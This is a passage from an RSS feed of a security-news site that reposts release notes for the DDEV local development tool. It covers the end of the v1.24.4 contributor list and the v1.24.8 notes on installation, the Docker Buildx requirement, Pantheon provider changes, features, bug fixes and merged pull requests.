<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PierrePaul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PierrePaul">@PierrePaul</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2958897102" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7168" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7168/hovercard" href="https://github.com/ddev/ddev/pull/7168">#7168</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RubenColpaert/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RubenColpaert">@RubenColpaert</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2916743723" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7076" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7076/hovercard" href="https://github.com/ddev/ddev/pull/7076">#7076</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.3...v1.24.4"><tt>v1.24.3...v1.24.4</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.8]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use apt install ddev or apt upgrade ddev see apt/yum installation
Windows and WSL2: Download the ddev_windows_amd64_installer.v1.24.8.exe; you can run i...]]></description>
<link>https://tsecurity.de/de/3497300/downloads/v1248/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497300/downloads/v1248/</guid>
<pubDate>Thu, 07 May 2026 22:17:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>apt install ddev</code> or <code>apt upgrade ddev</code> see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://github.com/ddev/ddev/releases/download/v1.24.8/ddev_windows_amd64_installer.v1.24.8.exe">ddev_windows_amd64_installer.v1.24.8.exe</a>; you can run it for install or upgrade.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2><g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Docker Buildx is now required for Docker Compose</h2>
<blockquote>
<p><strong>Warning:</strong> <code>Docker Compose is configured to build using Bake, but buildx isn't installed</code></p>
</blockquote>
<blockquote>
<p><strong>Error:</strong> <code>fork/exec ~/.docker/cli-plugins/docker-buildx: no such file or directory</code></p>
</blockquote>
<p>Docker Compose changed its default builder to Bake in <a href="https://github.com/docker/compose/releases/tag/v2.37.0">v2.37.0</a>.</p>
<p>DDEV v1.24.7 and below used older Docker Compose versions that relied on the legacy builder, but v1.24.8 uses a newer Docker Compose version that defaults to Bake, which requires Docker Buildx.</p>
<p><strong>Solution:</strong> Ensure Docker Buildx is installed on your system. Most modern Docker installations include Buildx by default, but if you encounter this error, you may need to update Docker or manually install the Buildx plugin.</p>
<h2><g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Pantheon provider changes</h2>
<p>DDEV v1.24.8 provides <code>.ddev/providers/pantheon.yaml</code> by default, which means if you already have this file with a <code>#ddev-generated</code> line inside, it will be overridden on upgrade:</p>
<ul>
<li>See the configuration changes directly in <code>.ddev/providers/pantheon.yaml</code></li>
<li>Learn how to set the <code>PANTHEON_SITE</code> and <code>PANTHEON_ENVIRONMENT</code> variables in <a href="https://docs.ddev.com/en/stable/users/providers/pantheon/" rel="nofollow">Pantheon Integration</a>.</li>
</ul>
<p>If you want to keep using <code>.ddev/providers/pantheon.yaml</code> from DDEV v1.24.7 and below:</p>
<ul>
<li>Remove the <code>#ddev-generated</code> line from your existing file and commit the change to git. DDEV will then leave your customized configuration untouched.</li>
<li>Or rename it to <code>.ddev/providers/&lt;anything&gt;.yaml</code>, for example <code>.ddev/providers/staging.yaml</code>, and use it with <code>ddev pull staging</code>.</li>
</ul>
<h2>Highlights</h2>
<ul>
<li>Experimental support for add-ons <a href="https://docs.ddev.com/en/stable/users/extend/creating-add-ons/#action-types-bash-vs-php" rel="nofollow">written primarily in PHP</a></li>
<li><code>ddev add-on get</code> can now automatically download add-on dependencies</li>
<li><code>ddev add-on get &lt;your **PRIVATE** GitHub repo&gt;</code>: Support for <code>DDEV_GITHUB_TOKEN</code> as a bearer token for GitHub downloads and private GitHub add-ons</li>
<li>Support for alternative GitHub token environment variables: <code>DDEV_GITHUB_TOKEN</code> (highest priority), <code>GH_TOKEN</code> (lower priority than <code>DDEV_GITHUB_TOKEN</code>), <code>GITHUB_TOKEN</code> (lowest priority)</li>
<li>Parallel Docker image pulls for faster performance, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glensc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glensc">@glensc</a> for the idea</li>
<li>Improved <a href="https://docs.ddev.com/en/stable/users/providers/pantheon/" rel="nofollow">Pantheon provider</a> support, <code>.ddev/providers/pantheon.yaml</code> provided by default</li>
<li>Upsun support for <a href="https://docs.ddev.com/en/stable/users/providers/upsun/#managing-multiple-apps" rel="nofollow">multiple apps</a> and <a href="https://docs.ddev.com/en/stable/users/providers/upsun/#managing-multiple-databases" rel="nofollow">multiple databases</a></li>
<li><a href="https://docs.ddev.com/" rel="nofollow">https://docs.ddev.com/</a> is now the canonical documentation source (replaces <a href="https://ddev.readthedocs.io/" rel="nofollow">https://ddev.readthedocs.io/</a>)</li>
<li>Dynamic DDEV project sponsorship information if provided once a day on <code>ddev start</code>.</li>
</ul>
<h2>Features</h2>
<ul>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#debug-download-images" rel="nofollow"><code>ddev debug download-images --all</code></a> now pulls all images for all projects</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#heidisql" rel="nofollow"><code>ddev heidisql</code></a> now works on Linux, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/punkrock34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/punkrock34">@punkrock34</a></li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#npx" rel="nofollow"><code>ddev npx</code></a> global command, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dragonwize/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dragonwize">@dragonwize</a></li>
<li><code>host.docker.internal</code> now available in all containers, not just <code>web</code></li>
<li>Pantheon provider now always pulls current upstream database (instead of a backup) and uses the Terminus rsync plugin for file push, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danny2p/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danny2p">@danny2p</a></li>
<li>Traefik healthcheck extended to validate file routers and detect config errors</li>
<li>Improved support for <code>ddev config global --no-bind-mounts</code> with automated testing</li>
<li>Manual testing with macOS 26 Tahoe (beta) shows no obvious problems; All Docker providers were casually tested.</li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Fix non-working <code>ddev-hostname</code> for Homebrew installations on Linux</li>
<li>Add missing ephemeral port handling to XHGui service, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>Allow <code>.DS_Store</code> files in <code>ddev composer create-project</code></li>
<li>Fix <code>ddev describe</code> to show exposed ports correctly on new Docker Desktop versions</li>
<li>Fix nginx configuration for Backdrop routes conflicting with directories</li>
<li>Use stable branch for <code>magerun</code> autocompletion script</li>
<li>Don't edit Laravel database config in <code>.env</code> when no database is present, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a></li>
<li>Remove obsolete PHP 8.4 <code>php.ini</code> configuration, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaystrobach/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaystrobach">@kaystrobach</a> for the report</li>
<li>Improve handling of "Failed to copy script" errors in the Windows installer</li>
</ul>
<h2>Internal Improvements</h2>
<ul>
<li>Major refactoring of internal Docker logic to reduce API calls and improve error handling</li>
<li>Set 20-minute download timeout for <code>docker-compose</code> and retry with doubled timeout on context deadline exceeded</li>
<li>Remove <code>docker context inspect</code> calls from each <code>ddev</code> command and use the Docker CLI API</li>
<li><code>ddev auth ssh</code> now uses the Docker API instead of <code>docker run</code> and supports stdin</li>
<li>Better reporting of MariaDB/MySQL/PostgreSQL client installation failures; removed download timeouts</li>
<li>Replace the Docker image <code>busybox:stable</code> with <code>ddev/ddev-utilities:latest</code> for internal use</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.3.25 and 8.4.12</li>
<li>Xdebug 3.4.5</li>
<li>Docker Compose v2.39.3</li>
<li>Add SVG support to TYPO3 nginx rewrite rules, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dhuf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dhuf">@dhuf</a></li>
<li>Disable <code>innodb_use_native_aio</code> for MariaDB 10.6 (upstream change)</li>
<li>Forward <code>*_PROXY</code> and <code>DDEV_*</code> environment variables for <code>root</code> user in <code>web</code> container</li>
<li>Add DDEV version output to <code>ddev describe</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomasnorre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomasnorre">@tomasnorre</a></li>
<li>Add warnings for empty pull/push operations in hosting providers</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>docs: Add CLAUDE.md to provide general prompts about behavior by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3245720727" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7467" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7467/hovercard" href="https://github.com/ddev/ddev/pull/7467">#7467</a></li>
<li>fix: Allow .DS_Store when doing ddev composer create-project [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3248128610" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7469" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7469/hovercard" href="https://github.com/ddev/ddev/pull/7469">#7469</a></li>
<li>ci: install <code>ddev</code> on Windows before test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3249747042" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7471" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7471/hovercard" href="https://github.com/ddev/ddev/pull/7471">#7471</a></li>
<li>refactor: use <code>compose-spec/compose-go/v2</code> for <code>fixupComposeYaml</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3195817486" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7422" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7422/hovercard" href="https://github.com/ddev/ddev/pull/7422">#7422</a></li>
<li>test: add a no-interaction flag to the install command in ibexa bats file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3257068260" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7479" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7479/hovercard" href="https://github.com/ddev/ddev/pull/7479">#7479</a></li>
<li>docs: note about <code>Flags</code> annotation with unknown flags, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3228650151" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7451" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7451/hovercard" href="https://github.com/ddev/ddev/pull/7451">#7451</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3256954032" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7478" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7478/hovercard" href="https://github.com/ddev/ddev/pull/7478">#7478</a></li>
<li>feat: update Pantheon provider to use environment variables, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1627492558" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/4760" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/4760/hovercard" href="https://github.com/ddev/ddev/issues/4760">#4760</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3253933952" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7475" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7475/hovercard" href="https://github.com/ddev/ddev/pull/7475">#7475</a></li>
<li>docs: Fix links pantheon.yaml.example -&gt; pantheon.yaml by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3257768359" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7481" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7481/hovercard" href="https://github.com/ddev/ddev/pull/7481">#7481</a></li>
<li>fix: Attempt to resolve windows installer problems with 'Failed to copy script', fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3262939610" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7485" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7485/hovercard" href="https://github.com/ddev/ddev/issues/7485">#7485</a>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="8624911" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/discussions/7477" data-hovercard-type="discussion" data-hovercard-url="/ddev/ddev/discussions/7477/hovercard" href="https://github.com/orgs/ddev/discussions/7477">#7477</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3273637837" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7493" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7493/hovercard" href="https://github.com/ddev/ddev/pull/7493">#7493</a></li>
<li>docs: explain how to make <code>build</code> stage in <code>docker-compose.*.yaml</code> work offline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3257192758" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7480" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7480/hovercard" href="https://github.com/ddev/ddev/pull/7480">#7480</a></li>
<li>feat: extend Traefik healthcheck to validate file routers and config errors, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2449233554" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6463" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6463/hovercard" href="https://github.com/ddev/ddev/issues/6463">#6463</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2535615699" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6553" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6553/hovercard" href="https://github.com/ddev/ddev/issues/6553">#6553</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3220168344" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7442" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7442/hovercard" href="https://github.com/ddev/ddev/pull/7442">#7442</a></li>
<li>feat: parallel <code>docker-compose pull</code>, improve <code>ddev debug download-images</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2956861749" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7163" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7163/hovercard" href="https://github.com/ddev/ddev/issues/7163">#7163</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3260508004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7483" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7483/hovercard" href="https://github.com/ddev/ddev/pull/7483">#7483</a></li>
<li>test: ngrok broke their installation moving to bookworm, fix it by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284642286" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7501" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7501/hovercard" href="https://github.com/ddev/ddev/pull/7501">#7501</a></li>
<li>build: use ddev/ddev-utilities instead of busybox, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284310649" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7499" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7499/hovercard" href="https://github.com/ddev/ddev/issues/7499">#7499</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284564571" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7500" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7500/hovercard" href="https://github.com/ddev/ddev/pull/7500">#7500</a></li>
<li>fix: Update obsolete WSL2 install scripts to reflect new ddev-wsl2 and not needing ddev.exe, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3244099732" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7464" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7464/hovercard" href="https://github.com/ddev/ddev/issues/7464">#7464</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3252819184" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7474" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7474/hovercard" href="https://github.com/ddev/ddev/pull/7474">#7474</a></li>
<li>ci: enforce conventional commits format for PR titles [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3294571886" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7513" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7513/hovercard" href="https://github.com/ddev/ddev/pull/7513">#7513</a></li>
<li>docs(claude): enhance CLAUDE.md with GitHub workflow guidance [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3282036910" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7497" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7497/hovercard" href="https://github.com/ddev/ddev/pull/7497">#7497</a></li>
<li>docs(wsl): add <code>wsl --update</code> command for Windows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adiati98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adiati98">@adiati98</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3254098957" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7476" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7476/hovercard" href="https://github.com/ddev/ddev/pull/7476">#7476</a></li>
<li>refactor: add svg to rewrite rule for TYPO3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dhuf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dhuf">@dhuf</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3260387579" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7482" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7482/hovercard" href="https://github.com/ddev/ddev/pull/7482">#7482</a></li>
<li>ci(pr-check): loosen start and middle rules for message [skip ci], for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3294571886" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7513" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7513/hovercard" href="https://github.com/ddev/ddev/pull/7513">#7513</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3300518843" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7515" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7515/hovercard" href="https://github.com/ddev/ddev/pull/7515">#7515</a></li>
<li>feat(sponsorship): add ability to download sponsorship data and other generic data, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2782574881" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6892" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6892/hovercard" href="https://github.com/ddev/ddev/issues/6892">#6892</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3285407689" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7502" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7502/hovercard" href="https://github.com/ddev/ddev/pull/7502">#7502</a></li>
<li>chore: revert 3 github copilot commits that it (I) shouldn't have done [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3302084163" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7517" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7517/hovercard" href="https://github.com/ddev/ddev/pull/7517">#7517</a></li>
<li>fix(ddev-hostname): sudo can't find ddev-hostname in linuxbrew, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3293316717" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7510" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7510/hovercard" href="https://github.com/ddev/ddev/issues/7510">#7510</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3294479176" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7512" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7512/hovercard" href="https://github.com/ddev/ddev/pull/7512">#7512</a></li>
<li>chore(localdev): add path management to .envrc [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3301757484" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7516" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7516/hovercard" href="https://github.com/ddev/ddev/pull/7516">#7516</a></li>
<li>fix(traefik): improve router port discovery and optimize YAML writes, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3285777167" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev-mongo/issues/24" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev-mongo/issues/24/hovercard" href="https://github.com/ddev/ddev-mongo/issues/24">ddev/ddev-mongo#24</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3289620309" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7507" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7507/hovercard" href="https://github.com/ddev/ddev/pull/7507">#7507</a></li>
<li>build(deps): bump actions/checkout from 4 to 5 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3311702418" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7521" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7521/hovercard" href="https://github.com/ddev/ddev/pull/7521">#7521</a></li>
<li>build(direnv): Make direnv .envrc idempotent so it doesn't do all that work all the time by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3307534737" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7520" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7520/hovercard" href="https://github.com/ddev/ddev/pull/7520">#7520</a></li>
<li>build(mariadb): turn off innodb_use_native_aio for mariadb:10.6 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3320004569" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7525" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7525/hovercard" href="https://github.com/ddev/ddev/pull/7525">#7525</a></li>
